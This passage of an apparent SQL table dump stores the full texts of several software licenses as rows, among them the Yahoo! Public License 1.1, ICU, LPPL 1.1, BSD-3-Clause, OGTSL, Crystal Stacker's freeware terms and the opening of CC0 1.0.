IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE LICENSED PRODUCT IS FREE OF DEFECTS, MERCHANTABLE, FIT\nFOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE LICENSED PRODUCT IS WITH YOU. SHOULD LICENSED PRODUCT\nPROVE DEFECTIVE IN ANY RESPECT, YOU (AND NOT THE LICENSOR OR ANY OTHER CONTRIBUTOR)\nASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF LICENSED\nPRODUCT IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 9. Termination.\n\na. Automatic Termination Upon Breach. This license and the rights granted\nhereunder will terminate automatically if you fail to comply with the terms\nherein and fail to cure such breach within thirty (30) days of becoming aware\nof the breach. All sublicenses to the Licensed Product that are properly granted\nshall survive any termination of this license. Provisions that, by their nature,\nmust remain in effect beyond the termination of this License, shall survive.\n\nb. Termination Upon Assertion of Patent Infringement. If you initiate litigation\nby asserting a patent infringement claim (excluding declaratory judgment actions)\nagainst Licensor or a Contributor (Licensor or Contributor against whom you\nfile such an action is referred to herein as \"Respondent\") alleging that Licensed\nProduct directly or indirectly infringes any patent, then any and all rights\ngranted by such Respondent to you under Sections 1 or 2 of this License shall\nterminate prospectively upon sixty (60) days notice from Respondent (the \"Notice\nPeriod\") unless within that Notice Period you either agree in writing (i)\nto pay Respondent a mutually agreeable reasonably royalty for your past or\nfuture use of Licensed Product made by such Respondent, or (ii) withdraw your\nlitigation claim with respect to Licensed Product against such Respondent.\nIf within said Notice Period a reasonable royalty and payment arrangement\nare not mutually agreed upon in writing by the parties or the litigation claim\nis not withdrawn, the rights granted by Licensor to you under Sections 1 and\n2 automatically terminate at the expiration of said Notice Period.\n\nc. Reasonable Value of This License. If you assert a patent infringement claim\nagainst Respondent alleging that Licensed Product directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by said Respondent under Sections 1 and 2 shall\nbe taken into account in determining the amount or value of any payment or\nlicense.\n\nd. No Retroactive Effect of Termination. In the event of termination under\nSections 9(a) or 9(b) above, all end user license agreements (excluding licenses\nto distributors and reselle rs) that have been validly granted by you or any\ndistributor hereunder prior to termination shall survive termination.\n\n 10. Limitation of Liability.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR, ANY CONTRIBUTOR,\nOR ANY DISTRIBUTOR OF LICENSED PRODUCT, OR ANY SUPPLIER OF ANY OF SUCH PARTIES,\nBE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL\nDAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF\nGOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER\nCOMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED\nOF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT\nAPPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH PARTY\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(72,'CrystalStacker','Crystal Stacker is freeware. This means you can pass copies around freely\nprovided you include this document in it\'s original form in your distribution.\nPlease see the \"Contacting Us\" section of this document if you need to contact\nus for any reason.\n\nDisclaimer\n\nNewCreature Design makes no guarantees regarding the Crystal Stacker software.\nWe are not responsible for damages caused by it, though the software is not\nknown to cause any problems. If you have trouble with the software, see the\n\"Contacting Us\" section of this document.\n\nThe source code is provided as-is and you may do with it whatsoever you please\nprovided that you include this file in its unmodified form with any new distribution.\nNewCreature Design makes no gaurantees regarding the usability of the source\nbut are willing to help with any problems you might run into. Please see the\n\"Contacting Us\" section of this document if you need to get in touch with\nus about any issues you have regarding the source.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(73,'YPL-1.1','Yahoo! Public License, Version 1.1 (YPL)\n\nThis Yahoo! Public License (this \"Agreement\") is a legal agreement that describes\nthe terms under which Yahoo! Inc., a Delaware corporation having its principal\nplace of business at 701 First Avenue, Sunnyvale, California 94089 (\"Yahoo!\")\nwill provide software to you via download or otherwise (\"Software\"). By using\nthe Software, you, an individual or an entity (\"You\") agree to the terms of\nthis Agreement.\n\nIn consideration of the mutual promises and upon the terms and conditions\nset forth below, the parties agree as follows:\n\n 1. Grant of Copyright License\n\n1.1 - Subject to the terms and conditions of this Agreement, Yahoo! hereby\ngrants to You, under any and all of its copyright interest in and to the Software,\na royalty-free, non-exclusive, non-transferable license to copy, modify, compile,\nexecute, and distribute the Software and Modifications. For the purposes of\nthis Agreement, any change to, addition to, or abridgement of the Software\nmade by You is a \"Modification;\" however, any file You add to the Software\nthat does not contain any part of the Software is not a \"Modification.\"\n\n1.2 - If You are an individual acting on behalf of a corporation or other\nentity, Your use of the Software or any Modification is subject to Your having\nthe authority to bind such corporation or entity to this Agreement. Providing\ncopies to persons within such corporation or entity is not considered distribution\nfor purposes of this Agreement.\n\n1.3 - For the Software or any Modification You distribute in source code format,\nYou must do so only under the terms of this Agreement, and You must include\na complete copy of this Agreement with Your distribution. With respect to\nany Modification You distribute in source code format, the terms of this Agreement\nwill apply to You in the same way those terms apply to Yahoo! with respect\nto the Software. In other words, when You are distributing Modifications under\nthis Agreement, You \"stand in the shoes\" of Yahoo! in terms of the rights\nYou grant and how the terms and conditions apply to You and the licensees\nof Your Modifications. Notwithstanding the foregoing, when You \"stand in the\nshoes\" of Yahoo!, You are not subject to the jurisdiction provision under\nSection 7, which requires all disputes under this Agreement to be subject\nto the jurisdiction of federal or state courts of northern California.\n\n1.4 - For the Software or any Modification You distribute in compiled or object\ncode format, You must also provide recipients with access to the Software\nor Modification in source code format along with a complete copy of this Agreement.\nThe distribution of the Software or Modifications in compiled or object code\nformat may be under a license of Your choice, provided that You are in compliance\nwith the terms of this Agreement. In addition, You must make absolutely clear\nthat any license terms applying to such Software or Modification that differ\nfrom this Agreement are offered by You alone and not by Yahoo!, and that such\nlicense does not restrict recipients from exercising rights in the source\ncode to the Software granted by Yahoo! under this Agreement or rights in the\nsource code to any Modification granted by You as described in Section 1.3.\n\n1.5 - This Agreement does not limit Your right to distribute files that are\nentirely Your own work (i.e., which do not incorporate any portion of the\nSoftware and are not Modifications) under any terms You choose.\n\n 2. Support\n\nYahoo! has no obligation to provide technical support or updates to You. Nothing\nin this Agreement requires Yahoo! to enter into any license with You for any\nother edition of the Software.\n\n 3. Intellectual Property Rights\n\n3.1 - Except for the license expressly granted under copyright in Section\n1.1, no rights, licenses or forbearances are granted or may arise in relation\nto this Agreement whether expressly, by implication, exhaustion, estoppel\nor otherwise. All rights, including all intellectual property rights, that\nare not expressly granted under this Agreement are hereby reserved.\n\n3.2 - In any copy of the Software or in any Modification you create, You must\nretain and reproduce, any and all copyright, patent, trademark, and attribution\nnotices that are included in the Software in the same form as they appear\nin the Software. This includes the preservation of attribution notices in\nthe form of trademarks or logos that exist within a user interface of the\nSoftware.\n\n3.3 - This license does not grant You rights to use any party\'s name, logo,\nor trademarks, except solely as necessary to comply with Section 3.2.\n\n 4. Disclaimer of Warranties\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY OF ANY KIND. YAHOO!\nMAKES NO WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY REGARDING OR RELATING\nTO THE SOFTWARE. SPECIFICALLY, YAHOO! DOES NOT WARRANT THAT THE SOFTWARE WILL\nBE ERROR FREE OR WILL PERFORM IN AN UNINTERRUPTED MANNER. TO THE GREATEST\nEXTENT ALLOWED BY LAW, YAHOO! SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE (EVEN IF YAHOO! HAD BEEN\nINFORMED OF SUCH PURPOSE), AND NONINFRINGEMENT WITH RESPECT TO THE SOFTWARE,\nANY MODIFICATIONS THERETO AND WITH RESPECT TO THE USE OF THE FOREGOING.\n\n 5. Limitation of Liability\n\nIN NO EVENT WILL YAHOO! BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES OF ANY KIND (INCLUDING WITHOUT LIMITATION\nLOSS OF PROFITS, LOSS OF USE, BUSINESS INTERRUPTION, LOSS OF DATA, COST OF\nCOVER) IN CONNECTION WITH OR ARISING OUT OF OR RELATING TO THE FURNISHING,\nPERFORMANCE OR USE OF THE SOFTWARE OR ANY OTHER RIGHTS GRANTED HEREUNDER,\nWHETHER ALLEGED AS A BREACH OF CONTRACT OR TORTIOUS CONDUCT, INCLUDING NEGLIGENCE,\nAND EVEN IF YAHOO! HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 6. Term and Termination\n\n6.1 - This Agreement will continue in effect unless and until terminated earlier\npursuant to this Section 6.\n\n6.2 - In the event You violate the terms of this Agreement, Yahoo! may terminate\nthis Agreement.\n\n6.3 - All licenses granted hereunder shall terminate upon the termination\nof this Agreement. Termination will be in addition to any rights and remedies\navailable to Yahoo! at law or equity or under this Agreement.\n\n6.4 - Termination of this Agreement will not affect the provisions regarding\nreservation of rights (Section 3.1), provisions disclaiming or limiting Yahoo!\'s\nliability (Sections 4 and 5), Termination (Section 6) or Miscellaneous (Section\n7), which provisions will survive termination of this Agreement.\n\n 7. Miscellaneous\n\nThis Agreement contains the entire agreement of the parties with respect to\nthe subject matter of this Agreement and supersedes all previous communications,\nrepresentations, understandings and agreements, either oral or written, between\nthe parties with respect to said subject matter. The relationship of the parties\nhereunder is that of independent contractors, and this Agreement will not\nbe construed as creating an agency, partnership, joint venture or any other\nform of legal association between the parties. If any term, condition, or\nprovision in this Agreement is found to be invalid, unlawful or unenforceable\nto any extent, this Agreement will be construed in a manner that most closely\neffectuates the intent of this Agreement. Such invalid term, condition or\nprovision will be severed from the remaining terms, conditions and provisions,\nwhich will continue to be valid and enforceable to the fullest extent permitted\nby law. This Agreement will be interpreted and construed in accordance with\nthe laws of the State of California and the United States of America, without\nregard to conflict of law principles. The U.N. Convention on Contracts for\nthe International Sale of Goods shall not apply to this Agreement. All disputes\narising out of this Agreement involving Yahoo! or any of its subsidiaries\nshall be subject to the jurisdiction of the federal or state courts of northern\nCalifornia, with venue lying in Santa Clara County, California. No rights\nmay be assigned, no obligations may be delegated, and this Agreement may not\nbe transferred by You, in whole or in part, whether voluntary or by operation\nof law, including by way of sale of assets, merger or consolidation, without\nthe prior written consent of Yahoo!, and any purported assignment, delegation\nor transfer without such consent shall be void ab initio. Any waiver of the\nprovisions of this Agreement or of a party\'s rights or remedies under this\nAgreement must be in writing to be effective. Failure, neglect or delay by\na party to enforce the provisions of this Agreement or its rights or remedies\nat any time, will not be construed or be deemed to be a waiver of such party\'s\nrights under this Agreement and will not in any way affect the validity of\nthe whole or any part of this Agreement or prejudice such party\'s right to\ntake subsequent action.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(74,'ICU','ICU License - ICU 1.8.1 and later\n\nCOPYRIGHT AND PERMISSION NOTICE\n\nCopyright (c) 1995-2014 International Business Machines Corporation and others\n\nAll rights reserved.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished to do so,\nprovided that the above copyright notice(s) and this permission notice appear\nin all copies of the Software and that both the above copyright notice(s)\nand this permission notice appear in supporting documentation.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO\nEVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS NOTICE BE LIABLE\nFOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION\nOF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION\nWITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nExcept as contained in this notice, the name of a copyright holder shall not\nbe used in advertising or otherwise to promote the sale, use or other dealings\nin this Software without prior written authorization of the copyright holder.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(75,'LPPL-1.1','The LaTeX Project Public License\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\nLPPL Version 1.1 1999-07-10\n\nCopyright 1999 LaTeX3 Project\n\nEveryone is allowed to distribute verbatim copies of this license document,\nbut modification of it is not allowed.\n\nPREAMBLE\n\n========\n\nThe LaTeX Project Public License (LPPL) is the license under which the base\nLaTeX distribution is distributed.\n\nYou may use this license for any program that you have written and wish to\ndistribute. This license may be particularly suitable if your program is TeX-related\n(such as a LaTeX package), but you may use it even if your program is unrelated\nto TeX. The section `WHETHER AND HOW TO DISTRIBUTE PROGRAMS UNDER THIS LICENSE\',\nbelow, gives instructions, examples, and recommendations for authors who are\nconsidering distributing their programs under this license.\n\nIn this license document, `The Program\' refers to any program distributed\nunder this license.\n\nThis license gives conditions under which The Program may be distributed and\nconditions under which modified versions of The Program may be distributed.\nIndividual files of The Program may bear supplementary and/or superseding\nconditions on modification of themselves and on the distribution of modified\nversions of themselves, but *no* file of The Program may bear supplementary\nor superseding conditions on the distribution of an unmodified copy of the\nfile. A distributor wishing to distribute a complete, unmodified copy of The\nProgram therefore needs to check the conditions only in this license and nowhere\nelse.\n\nActivities other than distribution and/or modification of The Program are\nnot covered by this license; they are outside its scope. In particular, the\nact of running The Program is not restricted.\n\nWe, the LaTeX3 Project, believe that the conditions below give you the freedom\nto make and distribute modified versions of The Program that conform with\nwhatever technical specifications you wish while maintaining the availability,\nintegrity, and reliability of The Program. If you do not see how to achieve\nyour goal while meeting these conditions, then read the document `cfgguide.tex\'\nin the base LaTeX distribution for suggestions.\n\nCONDITIONS ON DISTRIBUTION AND MODIFICATION\n\n===========================================\n\nYou may distribute a complete, unmodified copy of The Program. Distribution\nof only part of The Program is not allowed.\n\nYou may not modify in any way a file of The Program that bears a legal notice\nforbidding modification of that file.\n\nYou may distribute a modified file of The Program if, and only if, the following\neight conditions are met:\n\n1. You must meet any additional conditions borne by the file on the distribution\nof a modified version of the file as described below in the subsection `Additional\nConditions on Individual Files of The Program\'.\n\n2. If the file is a LaTeX software file, then you must meet any applicable\nadditional conditions on the distribution of a modified version of the file\nthat are described below in the subsection `Additional Conditions on LaTeX\nSoftware Files\'.\n\n3. You must not distribute the modified file with the filename of the original\nfile.\n\n4. In the modified file, you must acknowledge the authorship and name of the\noriginal file, and the name (if any) of the program which contains it.\n\n5. You must change any identification string in the file to indicate clearly\nthat the modified file is not part of The Program.\n\n6. You must change any addresses in the modified file for the reporting of\nerrors in the file or in The Program generally to ensure that reports for\nfiles no longer maintained by the original maintainers will be directed to\nthe maintainers of the modified files.\n\n7. You must distribute the modified file under a license that forbids distribution\nboth of the modified file and of any files derived from the modified file\nwith the filename of the original file.\n\n 8. You must do either (A) or (B):\n\n(A) distribute a copy of The Program (that is, a complete, unmodified copy\nof The Program) together with the modified file; if your distribution of the\nmodified file is made by offering access to copy the modified file from a\ndesignated place, then offering equivalent access to copy The Program from\nthe same place meets this condition, even though third parties are not compelled\nto copy The Program along with the modified file;\n\n(B) provide to those who receive the modified file information that is sufficient\nfor them to obtain a copy of The Program; for example, you may provide a Uniform\nResource Locator (URL) for a site that you expect will provide them with a\ncopy of The Program free of charge (either the version from which your modification\nis derived, or perhaps a later version).\n\nNote that in the above, `distribution\' of a file means making the file available\nto others by any means. This includes, for instance, installing the file on\nany machine in such a way that the file is accessible by users other than\nyourself. `Modification\' of a file means any procedure that produces a derivative\nfile under any applicable law -- that is, a file containing the original file\nor a significant portion of it, either verbatim or with modifications and/or\ntranslated into another language.\n\nChanging the name of a file is considered to be a modification of the file.\n\nThe distribution conditions in this license do not have to be applied to files\nthat have been modified in accordance with the above conditions. Note, however,\nthat Condition 7. does apply to any such modified file.\n\nThe conditions above are not intended to prohibit, and hence do not apply\nto, the updating, by any method, of a file so that it becomes identical to\nthe latest version of that file of The Program.\n\nA Recommendation on Modification Without Distribution\n\n-----------------------------------------------------\n\nIt is wise never to modify a file of The Program, even for your own personal\nuse, without also meeting the above eight conditions for distributing the\nmodified file. While you might intend that such modified files will never\nbe distributed, often this will happen by accident -- you may forget that\nyou have modified the file; or it may not occur to you when allowing others\nto access the modified file that you are thus distributing it and violating\nthe conditions of this license. It is usually in your best interest to keep\nyour copy of The Program identical with the public one. Many programs provide\nways to control the behavior of that program without altering its licensed\nfiles.\n\nAdditional Conditions on Individual Files of The Program\n\n--------------------------------------------------------\n\nAn individual file of The Program may bear additional conditions that supplement\nand/or supersede the conditions in this license if, and only if, such additional\nconditions exclusively concern modification of the file or distribution of\na modified version of the file. The conditions on individual files of The\nProgram therefore may differ only with respect to the kind and extent of modification\nof those files that is allowed, and with respect to the distribution of modified\nversions of those files.\n\nAdditional Conditions on LaTeX Software Files\n\n---------------------------------------------\n\nIf a file of The Program is intended to be used with LaTeX (that is, if it\nis a LaTeX software file), then the following additional conditions, which\nsupplement and/or supersede the conditions above, apply to the file according\nto its filename extension:\n\n- You may not modify any file with filename extension `.ins\' since these are\ninstallation files containing the legal notices that are placed in the files\nthey generate.\n\n- You may distribute modified versions of files with filename extension `.fd\'\n(LaTeX font definition files) under the standard conditions of the LPPL as\ndescribed above. You may also distribute such modified LaTeX font definition\nfiles with their original names provided that:\n\n(1) the only changes to the original files either enable use of available\nfonts or prevent attempts to access unavailable fonts;\n\n(2) you also distribute the original, unmodified files (TeX input paths can\nbe used to control which set of LaTeX font definition files is actually used\nby TeX).\n\n- You may distribute modified versions of files with filename extension `.cfg\'\n(configuration files) with their original names. The Program may (and usually\nwill) specify the range of commands that are allowed in a particular configuration\nfile.\n\nBecause of portability and exchangeability issues in LaTeX software, The LaTeX3\nProject deprecates the distribution of modified versions of components of\nLaTeX or of generally available contributed code for them, but such distribution\ncan meet the conditions of this license.\n\nNO WARRANTY\n\n===========\n\nThere is no warranty for The Program. Except when otherwise stated in writing,\nThe Copyright Holder provides The Program `as is\', without warranty of any\nkind, either expressed or implied, including, but not limited to, the implied\nwarranties of merchantability and fitness for a particular purpose. The entire\nrisk as to the quality and performance of The Program is with you. Should\nThe Program prove defective, you assume the cost of all necessary servicing,\nrepair, or correction.\n\nIn no event unless agreed to in writing will The Copyright Holder, or any\nauthor named in the files of The Program, or any other party who may distribute\nand/or modify The Program as permitted below, be liable to you for damages,\nincluding any general, special, incidental or consequential damages arising\nout of any use of The Program or out of inability to use The Program (including,\nbut not limited to, loss of data, data being rendered inaccurate, or losses\nsustained by anyone as a result of any failure of The Program to operate with\nany other programs), even if The Copyright Holder or said author or said other\nparty has been advised of the possibility of such damages.\n\nWHETHER AND HOW TO DISTRIBUTE PROGRAMS UNDER THIS LICENSE\n\n=========================================================\n\nThis section contains important instructions, examples, and recommendations\nfor authors who are considering distributing their programs under this license.\nThese authors are addressed as `you\' in this section.\n\nChoosing This License or Another License\n\n----------------------------------------\n\nIf for any part of your program you want or need to use *distribution* conditions\nthat differ from those in this license, then do not refer to this license\nanywhere in your program but instead distribute your program under a different\nlicense. You may use the text of this license as a model for your own license,\nbut your license should not refer to the LPPL or otherwise give the impression\nthat your program is distributed under the LPPL.\n\nThe document `modguide.tex\' in the base LaTeX distribution explains the motivation\nbehind the conditions of this license. It explains, for example, why distributing\nLaTeX under the GNU General Public License (GPL) was considered inappropriate.\nEven if your program is unrelated to LaTeX, the discussion in `modguide.tex\'\nmay still be relevant, and authors intending to distribute their programs\nunder any license are encouraged to read it.\n\nHow to Use This License\n\n-----------------------\n\nTo use this license, place in each of the files of your program both an explicit\ncopyright notice including your name and the year and also a statement that\nthe distribution and/or modification of the file is constrained by the conditions\nin this license.\n\nHere is an example of such a notice and statement:\n\n%% pig.dtx\n\n%% Copyright 2001 M. Y. Name\n\n%\n\n% This program may be distributed and/or modified under the\n\n% conditions of the LaTeX Project Public License, either version 1.1\n\n% of this license or (at your option) any later version.\n\n% The latest version of this license is in\n\n% http://www.latex-project.org/lppl.txt\n\n% and version 1.1 or later is part of all distributions of LaTeX\n\n% version 1999/06/01 or later.\n\n%\n\n% This program consists of the files pig.dtx and pig.ins\n\nGiven such a notice and statement in a file, the conditions given in this\nlicense document would apply, with `The Program\' referring to the two files\n`pig.dtx\' and `pig.ins\', and `The Copyright Holder\' referring to the person\n`M. Y. Name\'.\n\nImportant Recommendations\n\n-------------------------\n\nDefining What Constitutes The Program\n\nThe LPPL requires that distributions of The Program contain all the files\nof The Program. It is therefore important that you provide a way for the licensee\nto determine which files constitute The Program. This could, for example,\nbe achieved by explicitly listing all the files of The Program near the copyright\nnotice of each file or by using a line like\n\n% This program consists of all files listed in manifest.txt.\n\nin that place. In the absence of an unequivocal list it might be impossible\nfor the licensee to determine what is considered by you to comprise The Program.\n\nNoting Exceptional Files\n\nIf The Program contains any files bearing additional conditions on modification,\nor on distribution of modified versions, of those files (other than those\nlisted in `Additional Conditions on LaTeX Software Files\'), then it is recommended\nthat The Program contain a prominent file that defines the exceptional conditions,\nand either lists the exceptional files or defines one or more categories of\nexceptional files.\n\nFiles containing the text of a license (such as this file) are often examples\nof files bearing more restrictive conditions on modification. LaTeX configuration\nfiles (with filename extension `.cfg\') are examples of files bearing less\nrestrictive conditions on the distribution of a modified version of the file.\nThe additional conditions on LaTeX software given above are examples of declaring\na category of files bearing exceptional additional conditions.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(76,'BSD-3-Clause','Copyright (c) <year> <owner> . All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(77,'OGTSL','The Open Group Test Suite License Preamble\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nTesting is essential for proper development and maintenance of standards-based\nproducts.\n\nFor buyers: adequate conformance testing leads to reduced integration costs\nand protection of investments in applications, software and people.\n\nFor software developers: conformance testing of platforms and middleware greatly\nreduces the cost of developing and maintaining multi-platform application\nsoftware.\n\nFor suppliers: In-depth testing increases customer satisfaction and keeps\ndevelopment and support costs in check. API conformance is highly measurable\nand suppliers who claim it must be able to substantiate that claim.\n\nAs such, since these are benchmark measures of conformance, we feel the integrity\nof test tools is of importance. In order to preserve the integrity of the\nexisting conformance modes of this test package and to permit recipients of\nmodified versions of this package to run the original test modes, this license\nrequires that the original test modes be preserved.\n\nIf you find a bug in one of the standards mode test cases, please let us know\nso we can feed this back into the original, and also raise any specification\nissues with the appropriate bodies (for example the POSIX committees).\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least the following:\n\nrename any non-standard executables and testcases so the names do not conflict\nwith standard executables and testcases, which must also be provided, and\nprovide a separate manual page for each non-standard executable and testcase\nthat clearly documents how it differs from the Standard Version.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least the following:\n\naccompany any non-standard executables and testcases with their corresponding\nStandard Version executables and testcases, giving the non-standard executables\nand testcases non-standard names, and clearly documenting the differences\nin manual pages (or equivalent), together with instructions on where to get\nthe Standard Version.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7.Subroutines supplied by you and linked into this Package shall not be considered\npart of this Package.\n\n8. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n9. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(78,'CC0-1.0','Creative Commons Legal Code\n\nCC0 1.0 Universal CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES\nNOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE\nAN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS INFORMATION\nON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES REGARDING THE USE\nOF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED HEREUNDER, AND DISCLAIMS\nLIABILITY FOR DAMAGES RESULTING FROM THE USE OF THIS DOCUMENT OR THE INFORMATION\nOR WORKS PROVIDED HEREUNDER.\n\nStatement of Purpose\n\nThe laws of most jurisdictions throughout the world automatically confer exclusive\nCopyright and Related Rights (defined below) upon the creator and subsequent\nowner(s) (each and all, an \"owner\") of an original work of authorship and/or\na database (each, a \"Work\").\n\nCertain owners wish to permanently relinquish those rights to a Work for the\npurpose of contributing to a commons of creative, cultural and scientific\nworks (\"Commons\") that the public can reliably and without fear of later claims\nof infringement build upon, modify, incorporate in other works, reuse and\nredistribute as freely as possible in any form whatsoever and for any purposes,\nincluding without limitation commercial purposes. These owners may contribute\nto the Commons to promote the ideal of a free culture and the further production\nof creative, cultural and scientific works, or to gain reputation or greater\ndistribution for their Work in part through the use and efforts of others.\n\nFor these and/or other purposes and motivations, and without any expectation\nof additional consideration or compensation, the person associating CC0 with\na Work (the \"Affirmer\"), to the extent that he or she is an owner of Copyright\nand Related Rights in the Work, voluntarily elects to apply CC0 to the Work\nand publicly distribute the Work under its terms, with knowledge of his or\nher Copyright and Related Rights in the Work and the meaning and intended\nlegal effect of CC0 on those rights.\n\n1. Copyright and Related Rights. A Work made available under CC0 may be protected\nby copyright and related or neighboring rights (\"Copyright and Related Rights\").\nCopyright and Related Rights include, but are not limited to, the following:\n\ni. the right to reproduce, adapt, distribute, perform, display, communicate,\nand translate a Work;\n\n ii. moral rights retained by the original author(s) and/or 